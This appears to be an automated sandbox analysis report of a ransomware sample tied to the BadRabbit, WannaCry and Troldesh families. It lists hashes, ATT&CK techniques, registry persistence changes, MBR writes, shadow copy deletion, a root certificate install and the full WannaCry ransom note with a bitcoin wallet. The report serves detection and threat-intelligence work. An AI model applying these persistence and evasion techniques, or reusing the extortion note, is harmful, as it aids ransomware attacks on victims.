badrabbit | a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6

Analysis

max time kernel
52s
max time network
153s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
29-09-2022 12:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe
Size

148KB
MD5

d197fad90535fb974db139537a091a5b
SHA1

5529175952d3fa0697124260e46ec1dbd0c63ae7
SHA256

a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6
SHA512

1d43209ee1d950a433b08a05a23c69f88b376db3f52f29c84301d5235febda52a37c690abec96c2dfd63d4917b731b5544a548ce1490d9cf36aba9a031bac35d
SSDEEP

3072:Gs6dE9I6+dZXlX1sZhuJHxleadYgJcuFsdazXflJv:GYpC16C6adXcFcz

Score

10^/10

badrabbit troldesh wannacry bootkit discovery evasion persistence ransomware themida trojan upx worm

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\@Please_Read_Me@.txt

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Signatures

BadRabbit
Ransomware family discovered in late 2017, mainly targeting Russia and Ukraine.
ransomware badrabbit

Modifies WinLogon for persistence 2 TTPs 3 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

Endermanch@Xyeta.exeEndermanch@Birele.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Endermanch@Xyeta.exe"	Endermanch@Xyeta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Endermanch@Birele.exe"	Endermanch@Birele.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Endermanch@Xyeta.exe"	Endermanch@Xyeta.exe

Troldesh, Shade, Encoder.858
Troldesh is a ransomware spread by malspam.
ransomware trojan troldesh
Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

Endermanch@InternetSecurityGuard.exe

description ioc process

Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest Endermanch@InternetSecurityGuard.exe
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest	Endermanch@InternetSecurityGuard.exe

Executes dropped EXE 41 IoCs

Processes:

Endermanch@Antivirus.exeEndermanch@AntivirusPlatinum.exeEndermanch@AntivirusPro2017.exeEndermanch@AnViPC2009.exeEndermanch@BadRabbit.exeEndermanch@Birele.exeEndermanch@Cerber5.exeEndermanch@DeriaLock.exeEndermanch@FakeAdwCleaner.exeEndermanch@HappyAntivirus.exeEndermanch@InfinityCrypt.exeEndermanch@InternetSecurityGuard.exeEndermanch@Krotten.exeEndermanch@LPS2019.exe6AdwCleaner.exeEndermanch@Movie.mpeg.exeEndermanch@NavaShield.exeEndermanch@NoMoreRansom.exeEndermanch@PCDefender.exeEndermanch@Petya.A.exeEndermanch@PolyRansom.exeEndermanch@RegistrySmart.exeEndermanch@SE2011.exeEndermanch@SecurityCentral.exeEndermanch@SecurityDefender.exeDikkIMsc.exeEndermanch@SecurityDefener2015.exelwIEIUAw.exeEndermanch@SecurityScanner.exeEndermanch@SmartDefragmenter.exeEndermanch@VAV2008.exeEndermanch@ViraLock.exeEndermanch@WannaCrypt0r.exeEndermanch@WinlockerVB6Blacksod.exeEndermanch@Xyeta.exeFantom.exeis-PBJJ2.tmpwinsp2up.execonhost.exetaskdl.exeB56B.tmp

pid	process
692	Endermanch@Antivirus.exe
1000	Endermanch@AntivirusPlatinum.exe
1884	Endermanch@AntivirusPro2017.exe
892	Endermanch@AnViPC2009.exe
1200	Endermanch@BadRabbit.exe
1800	Endermanch@Birele.exe
1492	Endermanch@Cerber5.exe
964	Endermanch@DeriaLock.exe
1700	Endermanch@FakeAdwCleaner.exe
1748	Endermanch@HappyAntivirus.exe
2020	Endermanch@InfinityCrypt.exe
1608	Endermanch@InternetSecurityGuard.exe
860	Endermanch@Krotten.exe
1308	Endermanch@LPS2019.exe
1440	6AdwCleaner.exe
1404	Endermanch@Movie.mpeg.exe
1192	Endermanch@NavaShield.exe
1344	Endermanch@NoMoreRansom.exe
1464	Endermanch@PCDefender.exe
1048	Endermanch@Petya.A.exe
1536	Endermanch@PolyRansom.exe
952	Endermanch@RegistrySmart.exe
832	Endermanch@SE2011.exe
2016	Endermanch@SecurityCentral.exe
1648	Endermanch@SecurityDefender.exe
1576	DikkIMsc.exe
1588	Endermanch@SecurityDefener2015.exe
672	lwIEIUAw.exe
1676	Endermanch@SecurityScanner.exe
1980	Endermanch@SmartDefragmenter.exe
2060	Endermanch@VAV2008.exe
2168	Endermanch@ViraLock.exe
2244	Endermanch@WannaCrypt0r.exe
2312	Endermanch@WinlockerVB6Blacksod.exe
2360	Endermanch@Xyeta.exe
2404	Fantom.exe
2580	is-PBJJ2.tmp
2780	winsp2up.exe
2164	conhost.exe
2140	taskdl.exe
2852	B56B.tmp

Sets file execution options in registry 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Endermanch@Xyeta.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe	Endermanch@Xyeta.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "calc.exe"	Endermanch@Xyeta.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1800-94-0x0000000000400000-0x0000000000438000-memory.dmp	upx
behavioral1/memory/1800-78-0x0000000000400000-0x0000000000438000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\Endermanch@Birele.exe	upx
C:\Users\Admin\AppData\Local\Temp\Endermanch@VAV2008.exe	upx
C:\Users\Admin\AppData\Local\Temp\Endermanch@VAV2008.exe	upx
behavioral1/memory/2060-208-0x0000000000400000-0x0000000000423000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\Endermanch@VAV2008.exe	upx
\Users\Admin\AppData\Local\Temp\Endermanch@VAV2008.exe	upx
\Users\Admin\AppData\Local\Temp\Endermanch@VAV2008.exe	upx
C:\Users\Admin\AppData\Local\Temp\Endermanch@Xyeta.exe	upx
behavioral1/memory/2360-236-0x0000000000400000-0x000000000044F000-memory.dmp	upx
behavioral1/memory/1800-246-0x0000000000400000-0x0000000000438000-memory.dmp	upx
behavioral1/memory/1344-249-0x0000000000400000-0x00000000005DE000-memory.dmp	upx

Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

Endermanch@SE2011.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Wine Endermanch@SE2011.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Wine	Endermanch@SE2011.exe

Loads dropped DLL 22 IoCs

Processes:

Endermanch@FakeAdwCleaner.exeEndermanch@PolyRansom.exeEndermanch@VAV2008.exeEndermanch@RegistrySmart.exeEndermanch@SmartDefragmenter.exeWerFault.exeEndermanch@WinlockerVB6Blacksod.execmd.exeEndermanch@WannaCrypt0r.exewinsp2up.execmd.exe

pid	process
1700	Endermanch@FakeAdwCleaner.exe
1536	Endermanch@PolyRansom.exe
1536	Endermanch@PolyRansom.exe
1536	Endermanch@PolyRansom.exe
1536	Endermanch@PolyRansom.exe
2060	Endermanch@VAV2008.exe
2060	Endermanch@VAV2008.exe
2060	Endermanch@VAV2008.exe
952	Endermanch@RegistrySmart.exe
1980	Endermanch@SmartDefragmenter.exe
1980	Endermanch@SmartDefragmenter.exe
1684	WerFault.exe
1684	WerFault.exe
2312	Endermanch@WinlockerVB6Blacksod.exe
1684	WerFault.exe
2312	Endermanch@WinlockerVB6Blacksod.exe
744	cmd.exe
744	cmd.exe
2244	Endermanch@WannaCrypt0r.exe
2244	Endermanch@WannaCrypt0r.exe
2780	winsp2up.exe
2712	cmd.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exe

pid process

2688 icacls.exe
3328 icacls.exe

pid	process
2688	icacls.exe
3328	icacls.exe

Themida packer 5 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/memory/832-176-0x0000000000400000-0x0000000000CFB000-memory.dmp	themida
behavioral1/memory/832-242-0x0000000000400000-0x0000000000CFB000-memory.dmp	themida
behavioral1/memory/832-268-0x0000000000400000-0x0000000000CFB000-memory.dmp	themida
behavioral1/memory/832-294-0x0000000000400000-0x0000000000CFB000-memory.dmp	themida
behavioral1/memory/832-307-0x0000000000400000-0x0000000000CFB000-memory.dmp	themida

Adds Run key to start application 2 TTPs 11 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Endermanch@Birele.exeDikkIMsc.exeEndermanch@ViraLock.exeEndermanch@SmartDefragmenter.exeEndermanch@PolyRansom.exelwIEIUAw.exeEndermanch@NoMoreRansom.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Endermanch@Birele.exe"	Endermanch@Birele.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\DikkIMsc.exe = "C:\\Users\\Admin\\WoIIwYkc\\DikkIMsc.exe"	DikkIMsc.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	Endermanch@ViraLock.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run	Endermanch@SmartDefragmenter.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\winsp2up.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\winsp2up.exe"	Endermanch@SmartDefragmenter.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	Endermanch@Birele.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\DikkIMsc.exe = "C:\\Users\\Admin\\WoIIwYkc\\DikkIMsc.exe"	Endermanch@PolyRansom.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\lwIEIUAw.exe = "C:\\ProgramData\\WuUIQoAs\\lwIEIUAw.exe"	Endermanch@PolyRansom.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\lwIEIUAw.exe = "C:\\ProgramData\\WuUIQoAs\\lwIEIUAw.exe"	lwIEIUAw.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\	Endermanch@NoMoreRansom.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\""	Endermanch@NoMoreRansom.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 22 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Endermanch@InternetSecurityGuard.exe

description	ioc	process
File opened (read-only)	\??\M:	Endermanch@InternetSecurityGuard.exe
File opened (read-only)	\??\P:	Endermanch@InternetSecurityGuard.exe
File opened (read-only)	\??\S:	Endermanch@InternetSecurityGuard.exe
File opened (read-only)	\??\N:	Endermanch@InternetSecurityGuard.exe
File opened (read-only)	\??\O:	Endermanch@InternetSecurityGuard.exe
File opened (read-only)	\??\R:	Endermanch@InternetSecurityGuard.exe
File opened (read-only)	\??\U:	Endermanch@InternetSecurityGuard.exe
File opened (read-only)	\??\X:	Endermanch@InternetSecurityGuard.exe
File opened (read-only)	\??\V:	Endermanch@InternetSecurityGuard.exe
File opened (read-only)	\??\E:	Endermanch@InternetSecurityGuard.exe
File opened (read-only)	\??\G:	Endermanch@InternetSecurityGuard.exe
File opened (read-only)	\??\H:	Endermanch@InternetSecurityGuard.exe
File opened (read-only)	\??\J:	Endermanch@InternetSecurityGuard.exe
File opened (read-only)	\??\K:	Endermanch@InternetSecurityGuard.exe
File opened (read-only)	\??\Q:	Endermanch@InternetSecurityGuard.exe
File opened (read-only)	\??\T:	Endermanch@InternetSecurityGuard.exe
File opened (read-only)	\??\W:	Endermanch@InternetSecurityGuard.exe
File opened (read-only)	\??\F:	Endermanch@InternetSecurityGuard.exe
File opened (read-only)	\??\I:	Endermanch@InternetSecurityGuard.exe
File opened (read-only)	\??\L:	Endermanch@InternetSecurityGuard.exe
File opened (read-only)	\??\Y:	Endermanch@InternetSecurityGuard.exe
File opened (read-only)	\??\Z:	Endermanch@InternetSecurityGuard.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

Processes:

Endermanch@InternetSecurityGuard.exeEndermanch@AntivirusPro2017.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	Endermanch@InternetSecurityGuard.exe
File opened for modification	\??\PhysicalDrive0	Endermanch@AntivirusPro2017.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

Endermanch@SE2011.exe

pid process

832 Endermanch@SE2011.exe

pid	process
832	Endermanch@SE2011.exe

Drops file in Program Files directory 2 IoCs

Processes:

Endermanch@Antivirus.exe

description	ioc	process
File created	C:\Program Files (x86)\AnVi\splash.mp3	Endermanch@Antivirus.exe
File created	C:\Program Files (x86)\AnVi\virus.mp3	Endermanch@Antivirus.exe

Drops file in Windows directory 5 IoCs

Processes:

Endermanch@BadRabbit.exerundll32.exe

description	ioc	process
File created	C:\Windows\infpub.dat	Endermanch@BadRabbit.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File created	C:\Windows\cscc.dat	rundll32.exe
File created	C:\Windows\dispci.exe	rundll32.exe
File opened for modification	C:\Windows\B56B.tmp	rundll32.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

948 sc.exe
2276 sc.exe
4564 sc.exe
4892 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
948	sc.exe
2276	sc.exe
4564	sc.exe
4892	sc.exe

Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1684	1588	WerFault.exe	Endermanch@SecurityDefener2015.exe
4008	1004	WerFault.exe	Endermanch@SecurityDefener2015.exe
3040	2576	WerFault.exe	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Endermanch@FakeAdwCleaner.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\Endermanch@FakeAdwCleaner.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\Endermanch@FakeAdwCleaner.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\Endermanch@FakeAdwCleaner.exe	nsis_installer_2

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Endermanch@InfinityCrypt.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Endermanch@InfinityCrypt.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Endermanch@InfinityCrypt.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2148 schtasks.exe
3308 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

2200 vssadmin.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

956 taskkill.exe
2224 taskkill.exe

pid	process
2148	schtasks.exe
3308	schtasks.exe

pid	process
2200	vssadmin.exe

pid	process
956	taskkill.exe
2224	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

Endermanch@Antivirus.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Use FormSuggest = "Yes"	Endermanch@Antivirus.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main	Endermanch@Antivirus.exe

Modifies registry key 1 TTPs 42 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
4688	reg.exe
2212	reg.exe
1864	reg.exe
4264	reg.exe
3508	reg.exe
3476	reg.exe
3056	reg.exe
4336	reg.exe
4472	reg.exe
2928	reg.exe
3004	reg.exe
3152	reg.exe
3428	reg.exe
3028	reg.exe
4364	reg.exe
4680	reg.exe
2856	reg.exe
2220	reg.exe
2628	reg.exe
2144	reg.exe
4700	reg.exe
2080	reg.exe
1408	reg.exe
2332	reg.exe
3540	reg.exe
1120	reg.exe
3408	reg.exe
2144	reg.exe
2636	reg.exe
3120	reg.exe
3644	reg.exe
2136	reg.exe
3128	reg.exe
2616	reg.exe
1816	reg.exe
2624	reg.exe
2068	reg.exe
2548	reg.exe
4404	reg.exe
3548	reg.exe
3924	reg.exe
4252	reg.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3032 PING.EXE

pid	process
3032	PING.EXE

Suspicious behavior: EnumeratesProcesses 17 IoCs

Processes:

Endermanch@InternetSecurityGuard.exeEndermanch@PolyRansom.exeEndermanch@SE2011.exeEndermanch@ViraLock.exerundll32.exeEndermanch@NoMoreRansom.exewinsp2up.execonhost.exe

pid	process
1608	Endermanch@InternetSecurityGuard.exe
1536	Endermanch@PolyRansom.exe
1536	Endermanch@PolyRansom.exe
832	Endermanch@SE2011.exe
2168	Endermanch@ViraLock.exe
2168	Endermanch@ViraLock.exe
624	rundll32.exe
624	rundll32.exe
1344	Endermanch@NoMoreRansom.exe
1344	Endermanch@NoMoreRansom.exe
2780	winsp2up.exe
2780	winsp2up.exe
2780	winsp2up.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe

Suspicious use of AdjustPrivilegeToken 41 IoCs

Processes:

UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe6AdwCleaner.exerundll32.exeUDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exeFantom.exetaskkill.exeschtasks.exemsiexec.exeEndermanch@WinlockerVB6Blacksod.exe

description	pid	process
Token: SeDebugPrivilege	1768	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe
Token: SeDebugPrivilege	1440	6AdwCleaner.exe
Token: SeShutdownPrivilege	624	rundll32.exe
Token: SeDebugPrivilege	624	rundll32.exe
Token: SeTcbPrivilege	624	rundll32.exe
Token: SeDebugPrivilege	2504	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe
Token: SeDebugPrivilege	2404	Fantom.exe
Token: SeDebugPrivilege	956	taskkill.exe
Token: SeDebugPrivilege	2224	schtasks.exe
Token: SeRestorePrivilege	2052	msiexec.exe
Token: SeTakeOwnershipPrivilege	2052	msiexec.exe
Token: SeSecurityPrivilege	2052	msiexec.exe
Token: SeCreateTokenPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeAssignPrimaryTokenPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeLockMemoryPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeIncreaseQuotaPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeMachineAccountPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeTcbPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeSecurityPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeTakeOwnershipPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeLoadDriverPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeSystemProfilePrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeSystemtimePrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeProfSingleProcessPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeIncBasePriorityPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeCreatePagefilePrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeCreatePermanentPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeBackupPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeRestorePrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeShutdownPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeDebugPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeAuditPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeSystemEnvironmentPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeChangeNotifyPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeRemoteShutdownPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeUndockPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeSyncAgentPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeEnableDelegationPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeManageVolumePrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeImpersonatePrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe
Token: SeCreateGlobalPrivilege	2312	Endermanch@WinlockerVB6Blacksod.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

Endermanch@Antivirus.exeEndermanch@Xyeta.exe

pid process

692 Endermanch@Antivirus.exe
692 Endermanch@Antivirus.exe
692 Endermanch@Antivirus.exe
2360 Endermanch@Xyeta.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

Endermanch@Antivirus.exe

pid process

692 Endermanch@Antivirus.exe
692 Endermanch@Antivirus.exe
692 Endermanch@Antivirus.exe

Suspicious use of SetWindowsHookEx 10 IoCs

Processes:

Endermanch@Antivirus.exeEndermanch@SmartDefragmenter.exewinsp2up.exe

pid	process
692	Endermanch@Antivirus.exe
692	Endermanch@Antivirus.exe
692	Endermanch@Antivirus.exe
